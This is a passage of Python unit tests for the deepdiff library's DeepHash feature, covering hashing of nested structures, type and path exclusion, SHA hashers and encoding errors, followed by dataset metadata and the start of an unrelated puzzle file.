py_major_version, py_minor_version\nfrom tests import CustomClass2\n\nlogging.disable(logging.CRITICAL)\n\n\nclass ClassC:\n class_attr = 0\n\n def __init__(self, a, b=None):\n self.a = a\n self.b = b\n\n def __str__(self):\n return \"({}, {})\".format(self.a, self.b)\n\n __repr__ = __str__\n\n\n# Only the prep part of DeepHash. We don't need to test the actual hash function.\nDeepHashPrep = partial(DeepHash, apply_hash=False)\n\n\ndef prep_str(obj, ignore_string_type_changes=True):\n return obj if ignore_string_type_changes else 'str:{}'.format(obj)\n\n\nclass TestDeepHash:\n\n def test_dictionary(self):\n\n obj = {1: 1}\n result = DeepHash(obj)\n assert set(result.keys()) == {1, get_id(obj)}\n\n def test_get_hash_by_obj_is_the_same_as_by_obj_get_id(self):\n a = \"a\"\n obj = {1: a}\n result = DeepHash(obj)\n assert result[a]\n\n def test_deephash_repr(self):\n obj = \"a\"\n result = DeepHash(obj)\n assert \"{'a': '980410da9522db17c3ab8743541f192a5ab27772a6154dbc7795ee909e653a5c'}\" == repr(result)\n\n def test_deephash_values(self):\n obj = \"a\"\n result = list(DeepHash(obj).values())\n assert ['980410da9522db17c3ab8743541f192a5ab27772a6154dbc7795ee909e653a5c'] == result\n\n def test_deephash_keys(self):\n obj = \"a\"\n result = list(DeepHash(obj).keys())\n assert [\"a\"] == result\n\n def test_deephash_items(self):\n obj = \"a\"\n result = list(DeepHash(obj).items())\n assert [('a', '980410da9522db17c3ab8743541f192a5ab27772a6154dbc7795ee909e653a5c')] == result\n\n def test_get_hash_by_obj_when_does_not_exist(self):\n a = \"a\"\n obj = {1: a}\n result = DeepHash(obj)\n with pytest.raises(KeyError):\n result[2]\n\n def test_datetime(self):\n now = datetime.datetime.now()\n a = b = now\n a_hash = DeepHash(a)\n b_hash = DeepHash(b)\n assert a_hash[a] == b_hash[b]\n\n def test_datetime_truncate(self):\n a = datetime.datetime(2020, 5, 17, 22, 15, 34, 913070)\n b = datetime.datetime(2020, 5, 17, 22, 15, 39, 296583)\n c = datetime.datetime(2020, 5, 17, 22, 15, 34, 500000)\n\n a_hash = DeepHash(a, truncate_datetime='minute')\n b_hash = DeepHash(b, truncate_datetime='minute')\n assert a_hash[a] == b_hash[b]\n\n a_hash = DeepHash(a, truncate_datetime='second')\n c_hash = DeepHash(c, truncate_datetime='second')\n assert a_hash[a] == c_hash[c]\n\n def test_get_reserved_keyword(self):\n hashes = {UNPROCESSED_KEY: 'full item', 'key1': ('item', 'count')}\n result = DeepHash._getitem(hashes, obj='key1')\n assert 'item' == result\n # For reserved keys, it should just grab the object instead of grabbing an item in the tuple object.\n result = DeepHash._getitem(hashes, obj=UNPROCESSED_KEY)\n assert 'full item' == result\n\n def test_get_key(self):\n hashes = {'key1': ('item', 'count')}\n result = DeepHash.get_key(hashes, key='key2', default='banana')\n assert 'banana' == result\n\n def test_list_of_sets(self):\n a = {1}\n b = {2}\n obj = [a, b]\n result = DeepHash(obj)\n expected_result = {1, 2, get_id(a), get_id(b), get_id(obj)}\n assert set(result.keys()) == expected_result\n\n def test_bad_attribute(self):\n class Bad:\n __slots__ = ['x', 'y']\n\n def __getattr__(self, key):\n raise AttributeError(\"Bad item\")\n\n def __str__(self):\n return \"Bad Object\"\n\n def __repr__(self):\n return \"\".format(id(self))\n\n t1 = Bad()\n\n result = DeepHash(t1)\n expected_result = {t1: unprocessed, UNPROCESSED_KEY: [t1]}\n assert expected_result == result\n\n def test_built_in_hash_not_sensitive_to_bytecode_vs_unicode(self):\n a = 'hello'\n b = b'hello'\n a_hash = DeepHash(a, ignore_string_type_changes=True)[a]\n b_hash = DeepHash(b, ignore_string_type_changes=True)[b]\n assert a_hash == b_hash\n\n def test_sha1_hash_not_sensitive_to_bytecode_vs_unicode(self):\n a = 'hello'\n b = b'hello'\n a_hash = DeepHash(a, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)[a]\n b_hash = DeepHash(b, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)[b]\n assert a_hash == b_hash\n\n def test_path(self):\n a = Path('testdir')\n b = Path('testdir2')\n a_hash = DeepHash(a)[a]\n b_hash = DeepHash(b)[b]\n assert a_hash != b_hash\n\n def test_re(self):\n import re\n a = re.compile(\"asdf.?\")\n a_hash = DeepHash(a)[a]\n assert not( a_hash is unprocessed)\n\nclass TestDeepHashPrep:\n \"\"\"DeepHashPrep Tests covering object serialization.\"\"\"\n\n def test_prep_bool_vs_num1(self):\n assert {BoolObj.TRUE: 'bool:true'} == DeepHashPrep(True)\n assert {1: 'int:1'} == DeepHashPrep(1)\n\n def test_prep_bool_vs_num2(self):\n item1 = {\n \"Value One\": True,\n \"Value Two\": 1,\n }\n item2 = {\n \"Value Two\": 1,\n \"Value One\": True,\n }\n assert DeepHashPrep(item1)[item1] == DeepHashPrep(item2)[item2]\n\n def test_prep_str(self):\n obj = \"a\"\n expected_result = {obj: prep_str(obj)}\n result = DeepHashPrep(obj, ignore_string_type_changes=True)\n assert expected_result == result\n expected_result = {obj: prep_str(obj, ignore_string_type_changes=False)}\n result = DeepHashPrep(obj, ignore_string_type_changes=False)\n assert expected_result == result\n\n def test_dictionary_key_type_change(self):\n obj1 = {\"b\": 10}\n obj2 = {b\"b\": 10}\n\n result1 = DeepHashPrep(obj1, ignore_string_type_changes=True)\n result2 = DeepHashPrep(obj2, ignore_string_type_changes=True)\n assert result1[obj1] == result2[obj2]\n assert result1[\"b\"] == result2[b\"b\"]\n\n def test_number_type_change(self):\n obj1 = 10\n obj2 = 10.0\n\n result1 = DeepHashPrep(obj1)\n result2 = DeepHashPrep(obj2)\n assert result1[obj1] != result2[obj2]\n\n result1 = DeepHashPrep(obj1, ignore_numeric_type_changes=True)\n result2 = DeepHashPrep(obj2, ignore_numeric_type_changes=True)\n assert result1[obj1] == result2[obj2]\n\n def test_prep_str_fail_if_deephash_leaks_results(self):\n \"\"\"\n This test fails if DeepHash is getting a mutable copy of hashes\n which means each init of the DeepHash will have hashes from\n the previous init.\n \"\"\"\n obj1 = \"a\"\n expected_result = {obj1: prep_str(obj1)}\n result = DeepHashPrep(obj1, ignore_string_type_changes=True)\n assert expected_result == result\n obj2 = \"b\"\n result = DeepHashPrep(obj2, ignore_string_type_changes=True)\n assert obj1 not in result\n\n def test_dict_in_dict(self):\n obj2 = {2: 3}\n obj = {'a': obj2}\n result = DeepHashPrep(obj, ignore_string_type_changes=True)\n assert 'a' in result\n assert obj2 in result\n\n def do_list_or_tuple(self, func, func_str):\n string1 = \"a\"\n obj = func([string1, 10, 20])\n if func is list:\n obj_id = get_id(obj)\n else:\n obj_id = obj\n string1_prepped = prep_str(string1)\n expected_result = {\n 10: 'int:10',\n 20: 'int:20',\n string1: string1_prepped,\n obj_id: '{}:{},int:10,int:20'.format(func_str, string1_prepped),\n }\n result = DeepHashPrep(obj, ignore_string_type_changes=True)\n assert expected_result == result\n\n def test_list_and_tuple(self):\n for func, func_str in ((list, 'list'), (tuple, 'tuple')):\n self.do_list_or_tuple(func, func_str)\n\n def test_named_tuples(self):\n # checking if pypy3 is running the test\n # in that case due to a difference of string interning implementation\n # the id of x inside the named tuple changes.\n x = \"x\"\n x_prep = prep_str(x)\n Point = namedtuple('Point', [x])\n obj = Point(x=11)\n result = DeepHashPrep(obj, ignore_string_type_changes=True)\n if pypy3:\n assert result[obj] == \"ntPoint:{%s:int:11}\" % x\n else:\n expected_result = {\n x: x_prep,\n obj: \"ntPoint:{%s:int:11}\" % x,\n 11: 'int:11',\n }\n assert expected_result == result\n\n def test_hash_enum(self):\n class MyEnum(Enum):\n A = 1\n B = 2\n\n if (py_major_version, py_minor_version) >= (3, 11):\n assert DeepHashPrep(MyEnum.A)[MyEnum.A] == r'objMyEnum:{str:_name_:str:A;str:_sort_order_:int:0;str:_value_:int:1}'\n else:\n assert DeepHashPrep(MyEnum.A)[MyEnum.A] == r'objMyEnum:{str:_name_:str:A;str:_value_:int:1}'\n assert DeepHashPrep(MyEnum.A) == DeepHashPrep(MyEnum(1))\n assert DeepHashPrep(MyEnum.A) != DeepHashPrep(MyEnum.A.name)\n assert DeepHashPrep(MyEnum.A) != DeepHashPrep(MyEnum.A.value)\n assert DeepHashPrep(MyEnum.A) != DeepHashPrep(MyEnum.B)\n\n def test_dict_hash(self):\n string1 = \"a\"\n string1_prepped = prep_str(string1)\n key1 = \"key1\"\n key1_prepped = prep_str(key1)\n obj = {key1: string1, 1: 10, 2: 20}\n expected_result = {\n 1: 'int:1',\n 10: 'int:10',\n 2: 'int:2',\n 20: 'int:20',\n key1: key1_prepped,\n string1: string1_prepped,\n get_id(obj): 'dict:{{int:1:int:10;int:2:int:20;{}:{}}}'.format(key1, string1)\n }\n result = DeepHashPrep(obj, ignore_string_type_changes=True)\n assert expected_result == result\n\n def test_dict_in_list(self):\n string1 = \"a\"\n key1 = \"key1\"\n dict1 = {key1: string1, 1: 10, 2: 20}\n obj = [0, dict1]\n expected_result = {\n 0: 'int:0',\n 1: 'int:1',\n 10: 'int:10',\n 2: 'int:2',\n 20: 'int:20',\n key1: key1,\n string1: string1,\n get_id(dict1): 'dict:{int:1:int:10;int:2:int:20;%s:%s}' %\n (key1, string1),\n get_id(obj):\n 'list:dict:{int:1:int:10;int:2:int:20;%s:%s},int:0' %\n (key1, string1)\n }\n result = DeepHashPrep(obj, ignore_string_type_changes=True)\n assert expected_result == result\n\n def test_nested_lists_same_hash(self):\n t1 = [1, 2, [3, 4]]\n t2 = [[4, 3], 2, 1]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_nested_lists_same_hash2(self):\n t1 = [1, 2, [3, [4, 5]]]\n t2 = [[[5, 4], 3], 2, 1]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_nested_lists_same_hash3(self):\n t1 = [{1: [2, 3], 4: [5, [6, 7]]}]\n t2 = [{4: [[7, 6], 5], 1: [3, 2]}]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_nested_lists_in_dictionary_same_hash(self):\n t1 = [{\"c\": 4}, {\"c\": 3}]\n t2 = [{\"c\": 3}, {\"c\": 4}]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_same_sets_same_hash(self):\n t1 = {1, 3, 2}\n t2 = {2, 3, 1}\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n \n @pytest.mark.parametrize(\"list1, list2, ignore_iterable_order, is_equal\", [\n ([1, 2], [2, 1], False, False),\n ([1, 2], [2, 1], True, True),\n ([1, 2, 3], [1, 3, 2], False, False),\n ([1, [1, 2, 3]], [1, [3, 2, 1]], False, False),\n ([1, [1, 2, 3]], [1, [3, 2, 1]], True, True),\n ((1, 2), (2, 1), False, False),\n ((1, 2), (2, 1), True, True),\n ])\n def test_ignore_iterable_order(self, list1, list2, ignore_iterable_order, is_equal):\n list1_hash = DeepHash(list1, ignore_iterable_order=ignore_iterable_order)\n list2_hash = DeepHash(list2, ignore_iterable_order=ignore_iterable_order)\n \n assert is_equal == (list1_hash[list1] == list2_hash[list2])\n\n @pytest.mark.parametrize(\"t1, t2, significant_digits, number_format_notation, result\", [\n ({0.012, 0.98}, {0.013, 0.99}, 1, \"f\", 'set:float:0.0,float:1.0'),\n (100000, 100021, 3, \"e\", 'int:1.000e+5'),\n ])\n def test_similar_significant_hash(self, t1, t2, significant_digits,\n number_format_notation, result):\n t1_hash = DeepHashPrep(t1, significant_digits=significant_digits,\n number_format_notation=number_format_notation)\n t2_hash = DeepHashPrep(t2, significant_digits=significant_digits,\n number_format_notation=number_format_notation)\n\n if result:\n assert result == t1_hash[t1] == t2_hash[t2]\n else:\n assert t1_hash[t1] != t2_hash[t2]\n\n def test_number_to_string_func(self):\n def custom_number_to_string(number, *args, **kwargs):\n number = 100 if number < 100 else number\n return number_to_string(number, *args, **kwargs)\n\n t1 = [10, 12, 100000]\n t2 = [50, 63, 100021]\n t1_hash = DeepHashPrep(t1, significant_digits=4, number_format_notation=\"e\",\n number_to_string_func=custom_number_to_string)\n t2_hash = DeepHashPrep(t2, significant_digits=4, number_format_notation=\"e\",\n number_to_string_func=custom_number_to_string)\n\n assert t1_hash[10] == t2_hash[50] == t1_hash[12] == t2_hash[63] != t1_hash[100000]\n\n def test_same_sets_in_lists_same_hash(self):\n t1 = [\"a\", {1, 3, 2}]\n t2 = [{2, 3, 1}, \"a\"]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_unknown_parameters(self):\n with pytest.raises(ValueError):\n DeepHashPrep(1, wrong_param=2)\n\n def test_bad_attribute_prep(self):\n class Bad:\n __slots__ = ['x', 'y']\n\n def __getattr__(self, key):\n raise AttributeError(\"Bad item\")\n\n def __str__(self):\n return \"Bad Object\"\n\n t1 = Bad()\n\n result = DeepHashPrep(t1)\n expected_result = {t1: unprocessed, UNPROCESSED_KEY: [t1]}\n assert expected_result == result\n\n class Burrito:\n bread = 'flour'\n\n def __init__(self):\n self.spicy = True\n\n class Taco:\n bread = 'flour'\n\n def __init__(self):\n self.spicy = True\n\n class ClassA:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n class ClassB:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n class ClassC(ClassB):\n pass\n\n obj_a = ClassA(1, 2)\n obj_b = ClassB(1, 2)\n obj_c = ClassC(1, 2)\n\n burrito = Burrito()\n taco = Taco()\n\n @pytest.mark.parametrize(\"t1, t2, ignore_type_in_groups, ignore_type_subclasses, is_qual\", [\n (taco, burrito, [], False, False),\n (taco, burrito, [(Taco, Burrito)], False, True),\n ([taco], [burrito], [(Taco, Burrito)], False, True),\n ([obj_a], [obj_c], [(ClassA, ClassB)], False, False),\n ([obj_a], [obj_c], [(ClassA, ClassB)], True, True),\n ([obj_b], [obj_c], [(ClassB, )], True, True),\n ])\n def test_objects_with_same_content(self, t1, t2, ignore_type_in_groups, ignore_type_subclasses, is_qual):\n\n t1_result = DeepHashPrep(t1, ignore_type_in_groups=ignore_type_in_groups,\n ignore_type_subclasses=ignore_type_subclasses)\n t2_result = DeepHashPrep(t2, ignore_type_in_groups=ignore_type_in_groups,\n ignore_type_subclasses=ignore_type_subclasses)\n assert is_qual == (t1_result[t1] == t2_result[t2])\n\n def test_custom_object(self):\n cc_a = CustomClass2(prop1=[\"a\"], prop2=[\"b\"])\n t1 = [cc_a, CustomClass2(prop1=[\"c\"], prop2=[\"d\"])]\n t1_result = DeepHashPrep(t1)\n expected = 'list:objCustomClass2:{str:prop1:list:str:a;str:prop2:list:str:b},objCustomClass2:{str:prop1:list:str:c;str:prop2:list:str:d}' # NOQA\n assert expected == t1_result[t1]\n\n def test_repetition_by_default_does_not_effect(self):\n list1 = [3, 4]\n list1_id = get_id(list1)\n a = [1, 2, list1]\n a_id = get_id(a)\n\n list2 = [4, 3, 3]\n list2_id = get_id(list2)\n b = [list2, 2, 1]\n b_id = get_id(b)\n\n hash_a = DeepHashPrep(a)\n hash_b = DeepHashPrep(b)\n\n assert hash_a[list1_id] == hash_b[list2_id]\n assert hash_a[a_id] == hash_b[b_id]\n\n def test_setting_repetition_off_unequal_hash(self):\n list1 = [3, 4]\n list1_id = get_id(list1)\n a = [1, 2, list1]\n a_id = get_id(a)\n\n list2 = [4, 3, 3]\n list2_id = get_id(list2)\n b = [list2, 2, 1]\n b_id = get_id(b)\n\n hash_a = DeepHashPrep(a, ignore_repetition=False)\n hash_b = DeepHashPrep(b, ignore_repetition=False)\n\n assert not hash_a[list1_id] == hash_b[list2_id]\n assert not hash_a[a_id] == hash_b[b_id]\n\n assert hash_a[list1_id].replace('3|1', '3|2') == hash_b[list2_id]\n\n def test_already_calculated_hash_wont_be_recalculated(self):\n hashes = (i for i in range(10))\n\n def hasher(obj):\n return str(next(hashes))\n obj = \"a\"\n expected_result = {obj: '0'}\n result = DeepHash(obj, hasher=hasher)\n assert expected_result == result\n\n # we simply feed the last result to DeepHash\n # So it can re-use the results.\n result2 = DeepHash(obj, hasher=hasher, hashes=result)\n # if hashes are not cached and re-used,\n # then the next time hasher runs, it returns\n # number 1 instead of 0.\n assert expected_result == result2\n\n result3 = DeepHash(obj, hasher=hasher)\n expected_result = {obj: '1'}\n assert expected_result == result3\n\n def test_skip_type(self):\n l1 = logging.getLogger(\"test\")\n obj = {\"log\": l1, 2: 1337}\n result = DeepHashPrep(obj, exclude_types={logging.Logger})\n assert get_id(l1) not in result\n\n def test_skip_type2(self):\n l1 = logging.getLogger(\"test\")\n result = DeepHashPrep(l1, exclude_types={logging.Logger})\n assert not result\n\n def test_prep_dic_with_loop(self):\n obj = {2: 1337}\n obj[1] = obj\n result = DeepHashPrep(obj)\n expected_result = {get_id(obj): 'dict:{int:2:int:1337}', 1: 'int:1', 2: 'int:2', 1337: 'int:1337'}\n assert expected_result == result\n\n def test_prep_iterable_with_loop(self):\n obj = [1]\n obj.append(obj)\n result = DeepHashPrep(obj)\n expected_result = {get_id(obj): 'list:int:1', 1: 'int:1'}\n assert expected_result == result\n\n def test_prep_iterable_with_excluded_type(self):\n l1 = logging.getLogger(\"test\")\n obj = [1, l1]\n result = DeepHashPrep(obj, exclude_types={logging.Logger})\n assert get_id(l1) not in result\n\n def test_skip_str_type_in_dict_on_list(self):\n dic1 = {1: \"a\"}\n t1 = [dic1]\n dic2 = {}\n t2 = [dic2]\n t1_hash = DeepHashPrep(t1, exclude_types=[str])\n t2_hash = DeepHashPrep(t2, exclude_types=[str])\n assert 1 in t1_hash\n assert t1_hash[dic1] == t2_hash[dic2]\n\n def test_skip_path_in_hash(self):\n dic1 = {1: \"a\"}\n t1 = [dic1, 2]\n dic2 = {}\n t2 = [dic2, 2]\n t1_hash = DeepHashPrep(t1, exclude_paths=['root[0]'])\n t2_hash = DeepHashPrep(t2, exclude_paths='root[0]')\n t2_hash_again = DeepHashPrep(t2, include_paths='1')\n assert 1 not in t1_hash\n assert 2 in t1_hash\n assert t1_hash[2] == t2_hash[2]\n assert t1_hash[2] == t2_hash_again[2]\n\n def test_skip_path2(self):\n\n obj10 = {'a': 1, 'b': 'f', 'e': \"1111\", 'foo': {'bar': 'baz'}}\n obj11 = {'c': 1, 'd': 'f', 'e': 'Cool'}\n\n obj20 = {'a': 1, 'b': 'f', 'e': 'Cool', 'foo': {'bar': 'baz2'}}\n obj21 = {'c': 1, 'd': 'f', 'e': \"2222\"}\n\n t1 = [obj10, obj11]\n t2 = [obj20, obj21]\n\n exclude_paths = [\"root[0]['e']\", \"root[1]['e']\", \"root[0]['foo']['bar']\"]\n\n t1_hash = DeepHashPrep(t1, exclude_paths=exclude_paths)\n t2_hash = DeepHashPrep(t2, exclude_paths=exclude_paths)\n assert t1_hash[t1] == t2_hash[t2]\n\n def test_hash_include_path_nested(self):\n\n obj10 = {'a': 1, 'b': 'f', 'e': \"1111\", 'foo': {'bar': 'baz'}}\n obj11 = {'c': 1, 'd': 'f', 'e': 'Cool'}\n\n obj20 = {'a': 1, 'b': 'f', 'e': 'Cool', 'foo': {'bar': 'baz'}}\n obj21 = {'c': 1, 'd': 'f', 'e': \"2222\"}\n\n t1 = [obj10, obj11]\n t2 = [obj20, obj21]\n\n include_paths = [\"root[0]['foo']['bar']\"]\n\n t1_hash = DeepHashPrep(t1, include_paths=include_paths)\n t2_hash = DeepHashPrep(t2, include_paths=include_paths)\n assert t1_hash[t1] == t2_hash[t2]\n\n def test_skip_regex_path(self):\n dic1 = {1: \"a\"}\n t1 = [dic1, 2]\n exclude_re = re.compile(r'\\[0\\]')\n t1_hash = DeepHashPrep(t1, exclude_regex_paths=r'\\[0\\]')\n t2_hash = DeepHashPrep(t1, exclude_regex_paths=[exclude_re])\n assert 1 not in t1_hash\n assert 2 in t1_hash\n assert t1_hash[2] == t2_hash[2]\n\n def test_skip_hash_exclude_obj_callback(self):\n def exclude_obj_callback(obj, parent):\n return True if parent == \"root[0]['x']\" or obj == 2 else False\n\n dic1 = {\"x\": 1, \"y\": 2, \"z\": 3}\n t1 = [dic1]\n t1_hash = DeepHashPrep(t1, exclude_obj_callback=exclude_obj_callback)\n assert t1_hash == {'y': 'str:y', 'z': 'str:z', 3: 'int:3',\n get_id(dic1): 'dict:{str:z:int:3}', get_id(t1): 'list:dict:{str:z:int:3}'}\n dic2 = {\"z\": 3}\n t2 = [dic2]\n t2_hash = DeepHashPrep(t2, exclude_obj_callback=exclude_obj_callback)\n assert t1_hash[t1] == t2_hash[t2]\n\n def test_string_case(self):\n t1 = \"Hello\"\n\n t1_hash = DeepHashPrep(t1)\n assert t1_hash == {'Hello': 'str:Hello'}\n\n t1_hash = DeepHashPrep(t1, ignore_string_case=True)\n assert t1_hash == {'Hello': 'str:hello'}\n\n def test_hash_class(self):\n t1 = ClassC\n t1_hash = DeepHashPrep(t1)\n assert t1_hash['class_attr'] == 'str:class_attr'\n assert t1_hash[0] == 'int:0'\n # Note: we ignore private names in calculating hashes now. So you dont see __init__ here for example.\n assert t1_hash[t1] == r'objClassC:{str:class_attr:int:0}'\n\n def test_hash_set_in_list(self):\n t1 = [{1, 2, 3}, {4, 5}]\n t1_hash = DeepHashPrep(t1)\n assert t1_hash[t1] == 'list:set:int:1,int:2,int:3,set:int:4,int:5'\n\n def test_hash_numpy_array1(self):\n t1 = np.array([[1, 2]], np.int8)\n t2 = np.array([[2, 1]], np.int8)\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n assert t1_hash[t1] == 'ndarray:ndarray:int8:1,int8:2'\n assert t2_hash[t2] == t1_hash[t1]\n\n def test_hash_numpy_array_ignore_numeric_type_changes(self):\n t1 = np.array([[1, 2]], np.int8)\n t1_hash = DeepHashPrep(t1, ignore_numeric_type_changes=True)\n assert t1_hash[t1] == 'ndarray:ndarray:number:1.000000000000,number:2.000000000000'\n\n def test_hash_numpy_array2_multi_dimensional_can_not_retrieve_individual_array_item_hashes(self):\n \"\"\"\n This is a very interesting case. When DeepHash extracts t1[0] to create a hash for it,\n Numpy creates an array. But that array will only be technically available during the DeepHash run.\n Once DeepHash is run, the array is marked to be deleted by the garbage collector.\n However depending on the version of the python and the machine that runs it, by the time we get\n to the line that is t1_hash[t1[0]], the t1[0] may or may not be still in memory.\n If it is still in the memory, t1_hash[t1[0]] works without a problem.\n If it is already garbage collected, t1_hash[t1[0]] will throw a key error since there will be\n a new t1[0] by the time t1_hash[t1[0]] is called. Hence it will have a new ID and thus it\n will not be available anymore in t1_hash. Remember that since Numpy arrays are not hashable,\n the ID of the array is stored in t1_hash as a key and not the object itself.\n \"\"\"\n t1 = np.array([[1, 2, 3, 4], [4, 2, 2, 1]], np.int8)\n t1_hash = DeepHashPrep(t1)\n try:\n t1_hash[t1[0]]\n except Exception as e:\n assert str(e).strip(\"'\") == HASH_LOOKUP_ERR_MSG.format(t1[0])\n\n\nclass TestDeepHashSHA:\n \"\"\"DeepHash with SHA Tests.\"\"\"\n\n def test_str_sha1(self):\n obj = \"a\"\n expected_result = {\n obj: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8'\n }\n result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n assert expected_result == result\n\n def test_str_sha256(self):\n obj = \"a\"\n expected_result = {\n obj: 'ca978112ca1bbdcafac231b39a23dc4da786eff8147c4e72b9807785afee48bb'\n }\n result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha256hex)\n assert expected_result == result\n\n def test_prep_str_sha1_fail_if_mutable(self):\n \"\"\"\n This test fails if DeepHash is getting a mutable copy of hashes\n which means each init of the DeepHash will have hashes from\n the previous init.\n \"\"\"\n obj1 = \"a\"\n expected_result = {\n obj1: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8'\n }\n result = DeepHash(obj1, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n assert expected_result == result\n obj2 = \"b\"\n result = DeepHash(obj2, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n assert obj1 not in result\n\n def test_bytecode(self):\n obj = b\"a\"\n expected_result = {\n obj: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8'\n }\n result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n assert expected_result == result\n\n def test_list1(self):\n string1 = \"a\"\n obj = [string1, 10, 20]\n expected_result = {\n string1: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8',\n get_id(obj): 'eac61cbd194e5e03c210a3dce67b9bfd6a7b7acb',\n 10: DeepHash.sha1hex('int:10'),\n 20: DeepHash.sha1hex('int:20'),\n }\n result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n assert expected_result == result\n\n def test_dict1(self):\n string1 = \"a\"\n key1 = \"key1\"\n obj = {key1: string1, 1: 10, 2: 20}\n expected_result = {\n 1: DeepHash.sha1hex('int:1'),\n 10: DeepHash.sha1hex('int:10'),\n 2: DeepHash.sha1hex('int:2'),\n 20: DeepHash.sha1hex('int:20'),\n key1: '1073ab6cda4b991cd29f9e83a307f34004ae9327',\n string1: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8',\n get_id(obj): '11e23f096df81b1ccab0c309cdf8b4ba5a0a6895'\n }\n result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n assert expected_result == result\n\n\nclass TestCleaningString:\n\n @pytest.mark.parametrize(\"text, ignore_string_type_changes, expected_result\", [\n (b'hello', True, 'hello'),\n (b'hello', False, 'bytes:hello'),\n ('hello', True, 'hello'),\n ('hello', False, 'str:hello'),\n ])\n def test_clean_type(self, text, ignore_string_type_changes, expected_result):\n result = prepare_string_for_hashing(text, ignore_string_type_changes=ignore_string_type_changes)\n assert expected_result == result\n\n\nclass TestCounts:\n\n @pytest.mark.parametrize('obj, expected_count', [\n (\n {1: 1, 2: 3},\n 5\n ),\n (\n {\"key\": {1: 1, 2: 4}, \"key2\": [\"a\", \"b\"]},\n 11\n ),\n (\n [{1}],\n 3\n ),\n (\n [ClassC(a=10, b=11)],\n 6\n )\n ])\n def test_dict_count(self, obj, expected_count):\n \"\"\"\n How many object went to build this dict?\n \"\"\"\n\n result = DeepHash(obj).get(obj, extract_index=1)\n assert expected_count == result\n\n\nclass TestOtherHashFuncs:\n\n @pytest.mark.parametrize('items, prefix, expected', [\n ([[1], [2]], 'pre', 'pre583852d84b3482edf53408b64724a37289d7af458c44bb989a8abbffe24d2d2b'),\n ([[1], [2]], b'pre', 'pre583852d84b3482edf53408b64724a37289d7af458c44bb989a8abbffe24d2d2b'),\n ])\n def test_combine_hashes_lists(self, items, prefix, expected):\n result = combine_hashes_lists(items, prefix)\n assert expected == result\n\n EXPECTED_MESSAGE1 = (\n \"'utf-8' codec can't decode byte 0xc3 in position 0: invalid continuation byte in '('. \"\n \"Please either pass ignore_encoding_errors=True or pass the encoding via encodings=['utf-8', '...'].\")\n\n EXPECTED_MESSAGE2 = (\n \"'utf-8' codec can't decode byte 0xbc in position 0: invalid start byte in ' cup of flour'. \"\n \"Please either pass ignore_encoding_errors=True or pass the encoding via encodings=['utf-8', '...'].\")\n\n EXPECTED_MESSAGE3 = (\n \"'utf-8' codec can't decode byte 0xc3 in position 34: invalid continuation byte in '...up of potatos. Then ( cup of flour'. Please either pass ignore_encoding_errors=True or \"\n \"pass the encoding via encodings=['utf-8', '...'].\"\n )\n\n @pytest.mark.parametrize('test_num, item, encodings, ignore_encoding_errors, expected_result, expected_message', [\n (1, b'\\xc3\\x28', None, False, UnicodeDecodeError, EXPECTED_MESSAGE1),\n (2, b'\\xc3\\x28', ['utf-8'], False, UnicodeDecodeError, EXPECTED_MESSAGE1),\n (3, b'\\xc3\\x28', ['utf-8'], True, {b'\\xc3(': '640da73f0d9b268a0a7ae884d77063d1193f43a651352f9032d99a8fe1705546'}, None),\n (4, b\"\\xbc cup of flour\", ['utf-8'], False, UnicodeDecodeError, EXPECTED_MESSAGE2),\n (5, b\"\\xbc cup of flour\", ['utf-8'], True, {b'\\xbc cup of flour': '86ac12eb5e35db88cf93baca1d62098023b2d93d634e75fb4e37657e514f3d51'}, None),\n (6, b\"\\xbc cup of flour\", ['utf-8', 'latin-1'], False, {b'\\xbc cup of flour': 'cfc354ae2232a8983bf59b2004f44fcb4036f57df1d08b9cde9950adea3f8d3e'}, None),\n (7, b\"First have a cup of potatos. Then \\xc3\\x28 cup of flour\", None, False, UnicodeDecodeError, EXPECTED_MESSAGE3),\n ])\n def test_hash_encodings(self, test_num, item, encodings, ignore_encoding_errors, expected_result, expected_message):\n if UnicodeDecodeError == expected_result:\n with pytest.raises(expected_result) as exc_info:\n DeepHash(item, encodings=encodings, ignore_encoding_errors=ignore_encoding_errors)\n assert expected_message == str(exc_info.value), f\"test_encodings test #{test_num} failed.\"\n else:\n result = DeepHash(item, encodings=encodings, ignore_encoding_errors=ignore_encoding_errors)\n assert expected_result == result, f\"test_encodings test #{test_num} failed.\"\n","repo_name":"seperman/deepdiff","sub_path":"tests/test_hash.py","file_name":"test_hash.py","file_ext":"py","file_size_in_byte":32066,"program_lang":"python","lang":"en","doc_type":"code","stars":1785,"dataset":"github-code","pt":"52"} +{"seq_id":"73521751204","text":"\"\"\"\nW szachownicy o wymiarach 8x8 każdemu z pól przypisano liczbę naturalną. Na ruchy króla\nnałożono dwa 